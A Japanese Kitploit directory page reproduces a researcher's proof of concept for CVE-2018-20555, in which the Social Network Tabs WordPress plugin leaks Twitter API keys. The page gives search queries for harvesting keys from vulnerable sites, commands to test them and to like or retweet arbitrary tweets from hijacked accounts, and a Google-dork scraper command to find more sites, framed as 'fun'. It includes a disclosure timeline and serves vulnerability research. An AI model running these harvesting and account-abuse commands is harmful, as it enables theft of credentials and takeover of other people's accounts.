Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2018-20555 — Social Network Tabs Wordpressプラグインの脆弱性 - CVE-2018-20555 | Kitploit
ツール/GitHubGitHub/fs0c131y/cve-2018-20555
OSINT (オープンソースインテリジェンス)脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集クローラー
GitHubfs0c131y/cve-2018-20555

CVE-2018-20555

Social Network Tabs Wordpressプラグインの脆弱性 - CVE-2018-20555

リポジトリを見る
71187年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CVE-2018-20555

Design Chemical社製のWordPressプラグイン「Social Network Tabs」は、ユーザーのTwitterのaccess_token、access_token_secret、consumer_key、consumer_secretを2回漏洩させており、これによりTwitterアカウントが乗っ取られる可能性があります。

これは、Twitterウィジェットが表示されるページ内の以下のコード行によって引き起こされます:

root@kitploit:~
jQuery(document).ready(function ($) {
	var config = {
		widgets: "twitter,facebook,youtube",
		twitterId: "[redacted]",
		facebookId: "[redacted]",
		youtubeId: "[redacted]",
		twitter: {
			url: "https://www.rainx.com/wp-content/plugins/social-network-tabs/inc/dcwp_twitter.php?1=%5Breadcted%5D&2=%5Bredacted%5D&3=%5Bredacted%5D&4=%5Bredacted%5D …",
			title: "Latest Tweets",
			follow: "Follow",
			followId: "",
			limit: "10",
			retweets: true,
			replies: true,
			images: "thumb",
			consumer_key: "[redacted]",
			consumer_secret: "[redacted]",
			access_token: "[redacted]",
			access_token_secret: "[redacted]"
		},
	}
});

悪用

Publicwwwのおかげで、以下の検索クエリを使用して、539の脆弱なWebサイトからTwitterのaccess_token、access_token_secret、consumer_key、consumer_secretを取得しました:

  • dcwp_twitter.php access_token_secret snipexp:|access_token: "([\w\d-._]+)"|
  • dcwp_twitter.php access_token_secret snipexp:|access_token_secret: "([\w\d-._]+)"|
  • dcwp_twitter.php access_token_secret snipexp:|consumer_key: "([\w\d-._]+)"|
  • dcwp_twitter.php access_token_secret snipexp:|consumer_secret: "([\w\d-._]+)"|

すべてのキーはtwitter_keys.csvにあります。

使用方法

twitter_keys.csv内のTwitter APIキーをテストする

root@kitploit:~
python test_twitter_api_keys.py -t

このコマンドを初めて実行したとき、446のTwitterアカウントの情報を取得しました。リストには2つの認証済みアカウントと、10K以上のフォロワーを持つ複数のアカウントが含まれていたことに言及する価値があります。すべての脆弱なアカウントはvulnerable_accounts.txtにあります。

お楽しみ

任意のツイートにいいねする

root@kitploit:~
python test_twitter_api_keys.py -l [tweet_id]

任意のツイートをリツイートする

root@kitploit:~
python test_twitter_api_keys.py -r [tweet_id]

このコマンドを初めて実行したとき、任意のツイートに127回いいねすることができました。これは、127のTwitter APIキーが読み取り/書き込み権限を持っていたことを示しており、つまり、このキー漏洩により127のTwitterアカウントを乗っ取ることができました(プロフィール画像の変更、いいね、リツイート、バイオの変更など)。

更新 17/01/18

多くのWebサイト、ひいては多くのTwitterアカウントが依然としてこの問題に対して脆弱です。これらを特定するために、スクレイパーを作成しました。

root@kitploit:~
cd TwitterApiKeysSearchEngine/

scrapy crawl TwitterApiKeysSpider -a keyword="inurl:/inc/dcwp_twitter.php?1=" -a se=google -a pages=10

このGoogle検索クエリの結果の総数は3550です。最初の9ページのうち、78のキーを取得できました(86%)。お楽しみください!

開示

  • 01/12/18: Twitterへの開示
  • 0X/12/18: Twitterがすべてのキーを無効化
  • 11/12/18: Twitterによる有効なセキュリティ問題としての認識

連絡先

Twitterでフォローしてください!また、私の仕事の一部はhttps://fs0c131y.comで見ることができます。

クレジット

調査とPoCは❤️を込めて@fs0c131yによって作成されました。

ツールをダウンロード